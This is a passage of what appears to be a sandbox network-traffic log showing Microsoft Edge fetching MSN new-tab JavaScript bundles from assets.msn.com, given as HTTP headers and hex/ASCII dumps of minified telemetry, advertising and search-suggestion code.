r.b$,o.HD,o.hj,o.jn,o.mf,o.kJ,o.Kn,o.nd,r.MF,o.Y6,r.cp,s.p7,s.UY,o.l_,l.c9,l.Ib,o.Id,o.rW,o.Ym,o.o8,o.le,o.nr,o.mf,o.Kn,o.J_,o.kJ,o.VZ,o.HD,o.hj,o.jn,o.Y6,o.tO,o.UA,o.Mr,o.Xz,o.nd,d.pu,o.FY,o.l_,l.Ib,o.m6,r.w1,a.GW,a.Jj,u.pZ,u.az,u._l,u.CN,u.F6,a.DO;funct
2024-11-25 10:34:06 UTC	16384	IN	Data Raw: 30 30 30 30 36 30 30 30 0d 0a 65 5b 72 2e 4d 57 5d 28 61 29 2c 31 3d 3d 3d 65 3f 74 5b 63 2e 79 73 5d 28 73 29 3a 74 5b 63 2e 63 4c 5d 28 73 29 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 76 28 74 2c 6e 29 7b 76 61 72 20 69 3d 28 30 2c 6f 2e 6a 29 28 65 7c 7c 7b 7d 29 3b 69 26 26 69 5b 72 2e 6d 63 5d 26 26 69 5b 72 2e 6d 63 5d 28 74 2c 6e 29 7d 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 6e 3d 28 30 2c 61 2e 76 34 29 28 74 2e 6c 6f 67 67 69 6e 67 4c 65 76 65 6c 43 6f 6e 73 6f 6c 65 2c 30 29 2c 6c 3d 28 30 2c 61 2e 76 34 29 28 74 2e 6c 6f 67 67 69 6e 67 4c 65 76 65 6c 54 65 6c 65 6d 65 74 72 79 2c 31 29 2c 68 3d 28 30 2c 61 2e 76 34 29 28 74 2e 6d 61 78 4d 65 73 73 61 67 65 4c 69 6d 69 74 2c 32 35 29 2c 66 3d 28 30 2c 61 2e 76 34 29 28 74 5b 72 2e 46 72 5d 2c 21 31 29 Data Ascii: 00006000e[r.MW](a),1===e?t[c.ys](s):t[c.cL](s)}}}function v(t,n){var i=(0,o.j)(e\|\|{});i&&i[r.mc]&&i[r.mc](t,n)}!function(t){n=(0,a.v4)(t.loggingLevelConsole,0),l=(0,a.v4)(t.loggingLevelTelemetry,1),h=(0,a.v4)(t.maxMessageLimit,25),f=(0,a.v4)(t[r.Fr],!1)
2024-11-25 10:34:06 UTC	8204	IN	Data Raw: 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 6f 2e 5f 6e 65 78 74 28 29 3b 72 65 74 75 72 6e 20 65 26 26 65 2e 75 6e 6c 6f 61 64 28 61 2c 74 29 2c 21 65 7d 2c 61 5b 69 2e 7a 56 5d 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 3d 3d 3d 74 26 26 28 74 3d 6e 75 6c 6c 29 2c 28 30 2c 73 2e 6b 4a 29 28 74 29 26 26 28 74 3d 62 28 74 2c 72 2c 65 2c 6e 29 29 2c 76 28 74 7c 7c 61 5b 69 2e 57 32 5d 28 29 2c 65 2c 6e 29 7d 2c 61 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 74 2c 65 2c 6e 29 7b 76 61 72 20 72 3d 65 5b 69 2e 54 43 5d 7c 7c 7b 7d 2c 6f 3d 70 28 74 2c 72 2c 65 2c 6e 29 2e 63 74 78 3b 72 65 74 75 72 6e 20 6f 5b 69 2e 75 4c 5d 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6f 2e 69 74 65 72 61 74 65 28 28 66 Data Ascii: unction(t){var e=o._next();return e&&e.unload(a,t),!e},a[i.zV]=function(t,n){return void 0===t&&(t=null),(0,s.kJ)(t)&&(t=b(t,r,e,n)),v(t\|\|a[i.W2](),e,n)},a}function m(t,e,n){var r=e[i.TC]\|\|{},o=p(t,r,e,n).ctx;return o[i.uL]=function(t){return o.iterate((f
2024-11-25 10:34:06 UTC	16384	IN	Data Raw: 30 30 30 30 34 30 30 30 0d 0a 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 29 7b 76 61 72 20 65 3d 21 30 2c 6e 3d 21 30 2c 69 3d 21 30 2c 6f 3d 22 75 73 65 2d 63 6f 6c 6c 65 63 74 6f 72 2d 64 65 6c 74 61 22 2c 73 3d 21 31 3b 28 30 2c 72 2e 5a 29 28 74 2c 74 68 69 73 2c 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 2e 61 6c 6c 6f 77 52 65 71 75 65 73 74 53 65 6e 64 69 6e 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 2c 74 2e 66 69 72 73 74 52 65 71 75 65 73 74 53 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 26 26 28 69 3d 21 31 2c 73 7c 7c 28 65 3d 21 31 29 29 7d 2c 74 2e 73 68 6f 75 6c 64 41 64 64 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7d 2c 74 Data Ascii: 00004000=function(){function t(){var e=!0,n=!0,i=!0,o="use-collector-delta",s=!1;(0,r.Z)(t,this,(function(t){t.allowRequestSending=function(){return e},t.firstRequestSent=function(){i&&(i=!1,s\|\|(e=!1))},t.shouldAddClockSkewHeaders=function(){return n},t
2024-11-25 10:34:06 UTC	12	IN	Data Raw: 69 6f 6e 28 29 7b 44 3d 6e 75 0d 0a Data Ascii: ion(){D=nu
2024-11-25 10:34:06 UTC	16384	IN	Data Raw: 30 30 30 30 34 30 30 30 0d 0a 6c 6c 2c 4b 28 30 3d 3d 3d 4d 3f 33 3a 31 2c 30 2c 31 29 2c 4d 2b 2b 2c 4d 25 3d 32 2c 47 28 29 7d 29 2c 65 29 3a 4d 3d 30 29 7d 66 75 6e 63 74 69 6f 6e 20 58 28 29 7b 6e 3d 6e 75 6c 6c 2c 78 3d 21 31 2c 43 3d 5b 5d 2c 6b 3d 6e 75 6c 6c 2c 53 3d 21 31 2c 24 3d 30 2c 54 3d 35 30 30 2c 4c 3d 30 2c 4f 3d 31 65 34 2c 49 3d 7b 7d 2c 45 3d 70 2c 44 3d 6e 75 6c 6c 2c 52 3d 6e 75 6c 6c 2c 46 3d 30 2c 4d 3d 30 2c 66 3d 6e 75 6c 6c 2c 4e 3d 7b 7d 2c 76 3d 76 6f 69 64 20 30 2c 6d 3d 30 2c 6a 3d 2d 31 2c 62 3d 6e 75 6c 6c 2c 5f 3d 21 30 2c 7a 3d 21 31 2c 71 3d 36 2c 55 3d 32 2c 79 3d 6e 75 6c 6c 2c 77 3d 64 74 28 29 2c 67 3d 6e 65 77 20 63 74 28 35 30 30 2c 32 2c 31 2c 7b 72 65 71 75 65 75 65 3a 6c 74 2c 73 65 6e 64 3a 62 74 2c 73 65 6e Data Ascii: 00004000ll,K(0===M?3:1,0,1),M++,M%=2,G()}),e):M=0)}function X(){n=null,x=!1,C=[],k=null,S=!1,$=0,T=500,L=0,O=1e4,I={},E=p,D=null,R=null,F=0,M=0,f=null,N={},v=void 0,m=0,j=-1,b=null,_=!0,z=!1,q=6,U=2,y=null,w=dt(),g=new ct(500,2,1,{requeue:lt,send:bt,sen
2024-11-25 10:34:06 UTC	12	IN	Data Raw: 7b 61 3d 74 7d 7d 29 29 7d 72 0d 0a Data Ascii: {a=t}}))}r
2024-11-25 10:34:06 UTC	16384	IN	Data Raw: 30 30 30 30 34 30 30 30 0d 0a 65 74 75 72 6e 20 74 2e 63 6f 6f 6b 69 65 53 65 70 61 72 61 74 6f 72 3d 22 7c 22 2c 74 2e 75 73 65 72 43 6f 6f 6b 69 65 4e 61 6d 65 3d 22 61 69 5f 75 73 65 72 22 2c 74 2e 5f 73 74 61 74 69 63 49 6e 69 74 3d 76 6f 69 64 28 30 2c 73 2e 6c 5f 29 28 74 2e 70 72 6f 74 6f 74 79 70 65 2c 22 6c 6f 63 61 6c 49 64 22 2c 45 74 2c 44 74 29 2c 74 7d 28 29 2c 52 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 65 2e 70 6f 70 53 61 6d 70 6c 65 3d 31 30 30 2c 65 2e 65 76 65 6e 74 46 6c 61 67 73 3d 30 2c 74 2e 68 61 73 68 49 64 65 6e 74 69 66 69 65 72 73 26 26 28 65 2e 65 76 65 6e 74 46 6c 61 67 73 3d 31 30 34 38 35 37 36 7c 65 2e 65 76 65 6e 74 46 6c 61 67 73 29 2c 74 2e 64 72 6f 70 49 64 65 6e 74 69 66 69 65 72 73 Data Ascii: 00004000eturn t.cookieSeparator="\|",t.userCookieName="ai_user",t._staticInit=void(0,s.l_)(t.prototype,"localId",Et,Dt),t}(),Rt=function(t){var e=this;e.popSample=100,e.eventFlags=0,t.hashIdentifiers&&(e.eventFlags=1048576\|e.eventFlags),t.dropIdentifiers
2024-11-25 10:34:06 UTC	12	IN	Data Raw: 29 3d 3e 4d 61 74 68 2e 6d 69 0d 0a Data Ascii: )=>Math.mi

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
139	192.168.2.5	49902	23.209.72.7	443	7820	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:34:05 UTC	626	OUT	GET /bundles/v1/edgeChromium/latest/common.070b7e2c0c11bf3433e5.js HTTP/1.1 Host: assets.msn.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Origin: https://ntp.msn.com sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: script Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-25 10:34:06 UTC	1238	IN	HTTP/1.1 200 OK Content-Type: application/javascript Content-MD5: itko/yVH6O05iS5wLDykzA== Last-Modified: Fri, 22 Nov 2024 21:28:59 GMT ETag: 0x8DD0B3CAD953FDA Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0 x-ms-request-id: bb09feee-001e-0078-4225-3d5197000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Date: Mon, 25 Nov 2024 10:34:06 GMT Transfer-Encoding: chunked Connection: close Connection: Transfer-Encoding Alt-Svc: h3=":443"; ma=86400 Akamai-Request-BC: [a=23.210.4.152,b=1065387749,c=g,n=US_NJ_SECAUCUS,o=20940] Server-Timing: clientrtt; dur=2, clienttt; dur=0, origin; dur=0, cdntime; dur=0, wpo;dur=0,1s;dur=0 Akamai-Cache-Status: Hit from child Akamai-Server-IP: 23.210.4.152 Akamai-Request-ID: 3f8086e5 Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]} nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1} Cache-Control: public, no-transform, max-age=31535892 Timing-Allow-Origin: * Akamai-GRN: 0.9804d217.1732530846.3f8086e5 Vary: Origin
2024-11-25 10:34:06 UTC	15146	IN	Data Raw: 30 30 30 30 36 30 30 30 0d 0a 28 73 65 6c 66 2e 65 64 67 65 43 68 72 6f 6d 69 75 6d 57 65 62 70 61 63 6b 43 68 75 6e 6b 73 3d 73 65 6c 66 2e 65 64 67 65 43 68 72 6f 6d 69 75 6d 57 65 62 70 61 63 6b 43 68 75 6e 6b 73 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 63 6f 6d 6d 6f 6e 22 5d 2c 7b 33 36 37 37 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 46 76 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 7d 2c 67 51 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 7d 7d 29 3b 63 6f 6e 73 74 20 69 3d 22 73 65 6c 65 63 74 65 64 4e 61 76 49 74 65 6d 43 6c 69 63 6b 65 64 22 3b 63 6c 61 73 73 20 72 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 7b 74 68 69 73 2e 73 75 70 70 6f 72 74 Data Ascii: 00006000(self.edgeChromiumWebpackChunks=self.edgeChromiumWebpackChunks\|\|[]).push([["common"],{36777:function(e,t,n){"use strict";n.d(t,{Fv:function(){return r},gQ:function(){return i}});const i="selectedNavItemClicked";class r{constructor(){this.support
2024-11-25 10:34:06 UTC	9442	IN	Data Raw: 67 65 55 52 4c 28 65 29 7b 76 61 72 20 74 2c 6e 3b 69 66 28 6e 75 6c 6c 3d 3d 3d 28 74 3d 74 68 69 73 2e 63 6f 6e 66 69 67 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 7c 7c 21 74 2e 64 61 74 61 5b 65 5d 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 63 6f 6e 73 74 20 69 3d 6e 75 6c 6c 3d 3d 3d 28 6e 3d 74 68 69 73 2e 63 6f 6e 66 69 67 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 6e 3f 76 6f 69 64 20 30 3a 6e 2e 64 61 74 61 5b 65 5d 2e 69 6d 61 67 65 5b 60 69 24 7b 74 68 69 73 2e 63 75 72 72 65 6e 74 52 65 73 6f 6c 75 74 69 6f 6e 7d 60 5d 3b 72 65 74 75 72 6e 28 74 68 69 73 2e 62 61 63 6b 67 72 6f 75 6e 64 49 6d 61 67 65 57 43 2e 63 6f 6e 66 69 67 2e 65 6e 61 62 6c 65 53 74 61 74 69 63 49 6d 61 67 65 73 3f 28 30 2c 44 2e 62 66 29 28 60 69 6d 61 67 65 24 7b 65 7d 60 29 3a 44 2e Data Ascii: geURL(e){var t,n;if(null===(t=this.config)\|\|void 0===t\|\|!t.data[e])return null;const i=null===(n=this.config)\|\|void 0===n?void 0:n.data[e].image[`i${this.currentResolution}`];return(this.backgroundImageWC.config.enableStaticImages?(0,D.bf)(`image${e}`):D.
2024-11-25 10:34:06 UTC	16384	IN	Data Raw: 30 30 30 30 36 30 30 30 0d 0a 67 64 22 2c 7b 64 65 74 61 69 6c 3a 7b 69 73 4c 6f 77 45 6e 64 44 65 76 69 63 65 3a 21 31 7d 7d 29 29 2c 74 68 69 73 2e 69 73 46 52 45 26 26 74 68 69 73 2e 63 6f 6e 66 69 67 2e 64 69 73 61 62 6c 65 47 61 6c 6c 65 72 79 46 52 45 41 6e 64 4c 6f 77 45 6e 64 29 7b 74 68 69 73 2e 63 75 72 72 65 6e 74 50 72 6f 76 69 64 65 72 3d 22 46 52 45 42 61 63 6b 67 72 6f 75 6e 64 22 3b 62 72 65 61 6b 7d 69 66 28 74 68 69 73 2e 62 61 63 6b 67 72 6f 75 6e 64 47 61 6c 6c 65 72 79 45 6c 69 67 69 62 69 6c 69 74 79 26 26 74 68 69 73 2e 67 61 6c 6c 65 72 79 42 61 63 6b 67 72 6f 75 6e 64 53 65 6c 65 63 74 69 6f 6e 4d 65 74 61 64 61 74 61 29 7b 69 66 28 22 43 4d 53 49 6d 61 67 65 22 3d 3d 3d 74 68 69 73 2e 67 61 6c 6c 65 72 79 42 61 63 6b 67 72 6f 75 Data Ascii: 00006000gd",{detail:{isLowEndDevice:!1}})),this.isFRE&&this.config.disableGalleryFREAndLowEnd){this.currentProvider="FREBackground";break}if(this.backgroundGalleryEligibility&&this.galleryBackgroundSelectionMetadata){if("CMSImage"===this.galleryBackgrou
2024-11-25 10:34:06 UTC	8204	IN	Data Raw: 41 64 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 74 69 74 6c 65 2c 69 64 3a 6e 75 6c 6c 3d 3d 3d 28 74 3d 74 68 69 73 2e 6d 61 72 71 75 65 65 41 64 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 63 6c 69 63 6b 54 68 72 6f 75 67 68 55 72 6c 7d 7d 29 2e 67 65 74 4d 65 74 61 64 61 74 61 54 61 67 28 29 2c 74 68 69 73 2e 74 65 6c 65 6d 65 74 72 79 54 61 67 73 2e 6d 61 72 71 75 65 65 41 64 43 54 41 42 75 74 74 6f 6e 3d 74 68 69 73 2e 74 65 6c 65 6d 65 74 72 79 4f 62 6a 65 63 74 2e 61 64 64 4f 72 55 70 64 61 74 65 43 68 69 6c 64 28 7b 6e 61 6d 65 3a 22 4d 61 72 71 75 65 65 41 64 43 54 41 42 75 74 74 6f 6e 22 2c 74 79 70 65 3a 54 2e 63 39 2e 49 6e 74 65 72 61 63 74 69 6f 6e 2c 62 65 68 61 76 69 6f 72 3a 54 2e 77 75 Data Ascii: Ad)\|\|void 0===e?void 0:e.title,id:null===(t=this.marqueeAd)\|\|void 0===t?void 0:t.clickThroughUrl}}).getMetadataTag(),this.telemetryTags.marqueeAdCTAButton=this.telemetryObject.addOrUpdateChild({name:"MarqueeAdCTAButton",type:T.c9.Interaction,behavior:T.wu
2024-11-25 10:34:06 UTC	16384	IN	Data Raw: 30 30 30 30 34 30 30 30 0d 0a 3f 76 6f 69 64 20 30 3a 65 2e 70 72 6f 70 65 72 74 69 65 73 3b 69 66 28 28 6e 75 6c 6c 3d 3d 74 3f 76 6f 69 64 20 30 3a 74 2e 6c 65 6e 67 74 68 29 3e 30 26 26 6e 29 72 65 74 75 72 6e 20 6e 7d 63 61 74 63 68 28 65 29 7b 63 6f 6e 73 74 20 74 3d 22 45 72 72 6f 72 20 69 6e 20 67 65 74 74 69 6e 67 20 77 70 6f 20 65 76 65 6e 74 20 67 6c 65 61 6d 20 64 61 74 61 22 3b 28 30 2c 6f 2e 48 29 28 72 2e 4f 64 35 2c 74 2c 60 65 72 72 6f 72 3a 24 7b 65 7d 60 29 7d 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 28 29 29 2c 74 68 69 73 2e 63 68 72 6f 6d 69 75 6d 50 61 67 65 53 65 74 74 69 6e 67 73 43 6f 6e 6e 65 63 74 6f 72 3d 28 30 2c 57 2e 4b 30 29 28 6c 2e 52 4c 29 2c 74 68 69 73 2e 69 73 44 61 72 6b 4d 6f 64 65 3d 28 30 2c 59 2e 59 29 28 29 2c 74 68 Data Ascii: 00004000?void 0:e.properties;if((null==t?void 0:t.length)>0&&n)return n}catch(e){const t="Error in getting wpo event gleam data";(0,o.H)(r.Od5,t,`error:${e}`)}return null}()),this.chromiumPageSettingsConnector=(0,W.K0)(l.RL),this.isDarkMode=(0,Y.Y)(),th
2024-11-25 10:34:06 UTC	12	IN	Data Raw: 63 6b 5f 4d 61 72 71 75 65 65 0d 0a Data Ascii: ck_Marquee
2024-11-25 10:34:06 UTC	16384	IN	Data Raw: 30 30 30 30 34 30 30 30 0d 0a 41 64 28 74 68 69 73 2e 72 65 66 5f 6d 61 72 71 75 65 65 41 64 53 70 6f 6e 73 6f 72 4c 6f 67 6f 29 7d 61 73 79 6e 63 20 6f 6e 43 6c 69 63 6b 5f 4d 61 72 71 75 65 65 41 64 28 65 29 7b 77 69 6e 64 6f 77 2e 6f 70 65 6e 28 74 68 69 73 2e 6d 61 72 71 75 65 65 41 64 2e 63 6c 69 63 6b 54 68 72 6f 75 67 68 55 72 6c 2c 22 5f 62 6c 61 6e 6b 22 29 2e 66 6f 63 75 73 28 29 2c 61 77 61 69 74 20 73 65 2e 6f 2e 73 65 6e 64 42 65 61 63 6f 6e 73 28 74 68 69 73 2e 6d 61 72 71 75 65 65 41 64 2e 61 64 43 6c 69 63 6b 65 64 55 72 6c 73 29 2c 6b 2e 4d 30 2e 73 65 6e 64 41 63 74 69 6f 6e 45 76 65 6e 74 28 65 2c 54 2e 41 77 2e 43 6c 69 63 6b 2c 54 2e 77 75 2e 4e 61 76 69 67 61 74 65 29 7d 67 65 74 53 74 79 6c 65 46 6f 72 45 6c 65 6d 65 6e 74 4b 65 79 Data Ascii: 00004000Ad(this.ref_marqueeAdSponsorLogo)}async onClick_MarqueeAd(e){window.open(this.marqueeAd.clickThroughUrl,"_blank").focus(),await se.o.sendBeacons(this.marqueeAd.adClickedUrls),k.M0.sendActionEvent(e,T.Aw.Click,T.wu.Navigate)}getStyleForElementKey
2024-11-25 10:34:06 UTC	12	IN	Data Raw: 6c 6f 72 3a 72 67 62 61 28 30 0d 0a Data Ascii: lor:rgba(0
2024-11-25 10:34:06 UTC	16384	IN	Data Raw: 30 30 30 30 34 30 30 30 0d 0a 2c 30 2c 30 2c 30 2e 36 34 29 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 31 36 70 78 3b 63 75 72 73 6f 72 3a 64 65 66 61 75 6c 74 3b 68 65 69 67 68 74 3a 33 32 70 78 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 38 70 78 3b 77 69 64 74 68 3a 33 32 70 78 7d 2e 68 6f 74 53 70 6f 74 53 75 62 54 65 78 74 41 72 65 61 7b 63 6f 6c 6f 72 3a 72 67 62 61 28 32 35 35 2c 32 35 35 2c 32 35 35 2c 30 2e 37 34 29 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 36 70 78 3b 6f 70 61 63 69 74 79 3a 30 7d 2e 68 6f 74 53 70 6f 74 53 75 62 54 65 78 74 41 72 65 61 3a 68 6f 76 65 72 7b 6f 70 61 63 69 74 79 3a 31 7d 2e 68 6f 74 53 70 6f 74 54 65 78 74 41 72 65 61 7b 62 6f 72 64 65 72 2d 72 61 64 69 Data Ascii: 00004000,0,0,0.64);border-radius:16px;cursor:default;height:32px;margin-inline-end:8px;width:32px}.hotSpotSubTextArea{color:rgba(255,255,255,0.74);font-size:12px;line-height:16px;opacity:0}.hotSpotSubTextArea:hover{opacity:1}.hotSpotTextArea{border-radi
2024-11-25 10:34:06 UTC	12	IN	Data Raw: 79 6c 65 3d 74 68 69 73 2e 63 0d 0a Data Ascii: yle=this.c

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
140	192.168.2.5	49904	23.209.72.7	443	7820	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 10:34:05 UTC	630	OUT	GET /bundles/v1/edgeChromium/latest/experience.80ecb7588d9cda3b33a1.js HTTP/1.1 Host: assets.msn.com Connection: keep-alive sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Origin: https://ntp.msn.com sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: script Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-25 10:34:06 UTC	1238	IN	HTTP/1.1 200 OK Content-Type: application/javascript Content-MD5: b7kbCRWwEKJtwgSbViw16Q== Last-Modified: Fri, 22 Nov 2024 21:29:02 GMT ETag: 0x8DD0B3CAF973186 Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0 x-ms-request-id: f4db3461-501e-0044-1925-3dd020000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Date: Mon, 25 Nov 2024 10:34:06 GMT Transfer-Encoding: chunked Connection: close Connection: Transfer-Encoding Alt-Svc: h3=":443"; ma=86400 Akamai-Request-BC: [a=23.210.4.153,b=1108374970,c=g,n=US_NJ_SECAUCUS,o=20940] Server-Timing: clientrtt; dur=2, clienttt; dur=0, origin; dur=0, cdntime; dur=0, wpo;dur=0,1s;dur=0 Akamai-Cache-Status: Hit from child Akamai-Server-IP: 23.210.4.153 Akamai-Request-ID: 421075ba Access-Control-Allow-Credentials: true Access-Control-Allow-Origin: https://ntp.msn.com report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]} nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1} Cache-Control: public, no-transform, max-age=31535892 Timing-Allow-Origin: * Akamai-GRN: 0.9904d217.1732530846.421075ba Vary: Origin
2024-11-25 10:34:06 UTC	15146	IN	Data Raw: 30 30 30 30 36 30 30 30 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 2c 6e 2c 6f 2c 61 2c 69 2c 72 3d 7b 32 33 38 36 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 53 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 71 7d 7d 29 3b 76 61 72 20 6f 3d 6e 28 33 33 39 34 30 29 2c 61 3d 6e 28 36 35 31 37 35 29 2c 69 3d 6e 28 36 33 30 37 30 29 2c 72 3d 6e 28 33 39 30 30 31 29 2c 73 3d 6e 28 32 32 33 39 30 29 2c 64 3d 6e 28 34 34 38 38 36 29 2c 63 3d 6e 28 34 30 39 32 34 29 3b 76 61 72 20 6c 3d 6e 28 32 38 39 30 34 29 2c 70 3d 6e 28 39 39 34 35 32 29 2c 6d 3d 6e 28 34 32 35 39 30 29 2c 67 3d 6e 28 39 34 35 33 37 29 2c 75 3d 6e 28 38 35 32 30 35 29 2c 68 3d 6e 28 34 37 34 Data Ascii: 00006000!function(){var e,t,n,o,a,i,r={23865:function(e,t,n){"use strict";n.d(t,{S:function(){return q}});var o=n(33940),a=n(65175),i=n(63070),r=n(39001),s=n(22390),d=n(44886),c=n(40924);var l=n(28904),p=n(99452),m=n(42590),g=n(94537),u=n(85205),h=n(474
2024-11-25 10:34:06 UTC	9442	IN	Data Raw: 44 6f 77 6e 53 63 72 6f 6c 6c 48 61 70 70 65 6e 65 64 3d 21 31 2c 74 68 69 73 2e 66 69 72 73 74 43 6c 69 63 6b 4c 6f 67 3d 21 31 2c 74 68 69 73 2e 66 69 72 73 74 4b 65 79 50 72 65 73 73 4c 6f 67 3d 21 31 2c 74 68 69 73 2e 62 69 6e 67 55 70 73 65 6c 6c 46 6f 63 75 73 65 64 3d 21 31 2c 74 68 69 73 2e 74 72 65 6e 64 69 6e 67 53 65 61 72 63 68 65 73 52 65 71 75 65 73 74 65 64 3d 21 31 2c 74 68 69 73 2e 6f 6e 41 75 74 6f 73 75 67 67 65 73 74 52 65 6e 64 65 72 65 64 3d 65 3d 3e 7b 63 6f 6e 73 74 20 74 3d 65 2e 74 61 72 67 65 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 53 75 67 67 4d 6f 64 65 22 29 3b 74 68 69 73 2e 69 73 4e 65 78 74 57 6f 72 64 41 53 4d 6f 64 65 3d 22 31 22 3d 3d 3d 74 7d 2c 74 68 69 73 2e 6f 6e 41 75 74 6f 73 75 67 67 65 73 74 53 68 6f 77 Data Ascii: DownScrollHappened=!1,this.firstClickLog=!1,this.firstKeyPressLog=!1,this.bingUpsellFocused=!1,this.trendingSearchesRequested=!1,this.onAutosuggestRendered=e=>{const t=e.target.getAttribute("SuggMode");this.isNextWordASMode="1"===t},this.onAutosuggestShow
2024-11-25 10:34:06 UTC	16384	IN	Data Raw: 30 30 30 30 36 30 30 30 0d 0a 6f 70 65 26 26 22 6b 69 64 73 22 3d 3d 3d 73 2e 6a 47 2e 43 75 72 72 65 6e 74 52 65 71 75 65 73 74 54 61 72 67 65 74 53 63 6f 70 65 2e 61 75 64 69 65 6e 63 65 4d 6f 64 65 3b 21 30 3d 3d 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 65 6e 61 62 6c 65 57 65 62 41 50 49 53 75 67 67 65 74 69 6f 6e 26 26 21 6e 26 26 21 74 68 69 73 2e 69 73 4d 6f 62 69 6c 65 28 29 26 26 21 74 68 69 73 2e 69 73 54 61 62 6c 65 74 28 29 26 26 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 65 6e 61 62 6c 65 4d 53 4e 53 75 67 67 65 73 74 69 6f 6e 73 26 26 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 65 6e 61 62 6c 65 4d 53 4e 53 75 67 67 65 73 74 69 6f 6e 73 3e 30 3f 31 3d 3d 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 65 6e 61 62 6c 65 4d 53 4e 53 75 67 67 65 73 74 69 6f Data Ascii: 00006000ope&&"kids"===s.jG.CurrentRequestTargetScope.audienceMode;!0===this.options.enableWebAPISuggetion&&!n&&!this.isMobile()&&!this.isTablet()&&this.options.enableMSNSuggestions&&this.options.enableMSNSuggestions>0?1===this.options.enableMSNSuggestio
